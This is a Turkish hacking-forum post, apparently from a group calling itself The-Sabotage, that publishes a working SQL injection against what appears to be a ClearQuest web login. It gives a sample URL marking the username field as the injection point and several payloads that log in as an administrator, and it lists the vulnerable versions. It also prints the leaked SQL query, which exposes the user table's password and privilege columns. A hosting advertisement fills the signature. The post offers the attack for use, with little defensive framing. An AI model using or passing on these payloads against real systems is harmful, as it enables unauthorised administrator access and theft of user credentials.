![]() |
|
|||||||
| Exploit / Vulnerabilities Güncel EXPloit Açıkları ile İlgili Bölümümüz |
![]() |
|
|
LinkBack | Seçenekler | Stil |
|
|
#1 (permalink) |
|
MaReŞaL
![]() Üyelik tarihi: Feb 2007
Mesajlar: 580
|
SAMPLE URL:
=========== http://SERVERNAMEHERE/cqweb/main?command=GenerateMainFrame&ratl_userdb=DATABAS ENAMEHERE,&test=&clientServerAddress=http://SERVERNAMEHERE/cqweb/login&username='INJECTIONGOESHERE&password=PASSWOR DHERE&schema=SCHEMEAHERE&userDb=DATABASENAMEHERE Log in as "admin": ================== ' OR login_name LIKE '%admin%'-- (other variations work as well) ' OR login_name LIKE 'admin%'-- ' OR LOWER(login_name) LIKE '%admin%'-- ' OR LOWER(login_name) LIKE 'admin%'-- etc...use your imagination... Confirmed against: ================== version 7.0.0.1 Label BALTIC_PATCH.D0609.929 version 7.0.0.0-IFIX02 Label BALTIC_PATCH.D060630 FULL SQL Statement is spit back in error message: ================================================= SELECT master_users.master_dbid, master_users.login_name, master_users.encrypted_password, master_users.email, master_users.fullname, master_users.phone, master_users.misc_info, master_users.is_active, master_users.is_superuser, master_users.is_appbuilder, master_users.is_user_maint, ratl_mastership, ratl_keysite, master_users.ratl_priv_mask FROM master_users WHERE login_name = 'INJECTION GOES HERE
__________________
--==+=============================================== =================================+==-- --==+ HENRYAPO +==-- --==+=============================================== =================================+==-- --==+ The-Sabotage Cyber Hackers And Security Platform +==-- --==+=============================================== =================================+==-- Profdizayn İnternet Hizmetleri [Linkleri görebilmek için üye olmalısınız. Üye olmak için tıklayınız...] --> En Kalite Hızlı Sunucular --> Domain 10 YTL --> Uygun Fiyatlar... --> Joomla Uyumlu Sunucular... Hosting Seçiminizde Özel ve Gold Paket Seçin Karlı Cıkın.. vbulletin, Joomla, Smf, WordPress vs. Bunun Gibi Hazır Sistem Kurulumu Bizden.. %100 Güvenli Sunucular - Full Destek & Hacklenmeme Garantisi... Daha Önce Kim size Hacklenmeme Garantisi verdi? Biz veriyoruz eğerki bizden kaynaklanan Hata Yüzünden Web sitenize birsey Olursa Ücret İyadesi Ediyoruz... Full Güvenlikli Bir Web Sitesi İstiyorsanız Bizi Tercih EDİN ! Hiç Birimiz Sabah Kalktığında Sitesinde Siyah bir Sayfa Görmek İstemez Dimi? The-SaboTage.Org Tarafından Onaylıdır... Tıklayın Lütfen ; [Linkleri görebilmek için üye olmalısınız. Üye olmak için tıklayınız...] |
|
|
|
![]() |
| Konuyu Toplam 1 Üye okuyor. (0 Kayıtlı üye ve 1 Misafir) | |
| Seçenekler | |
| Stil | |
|
|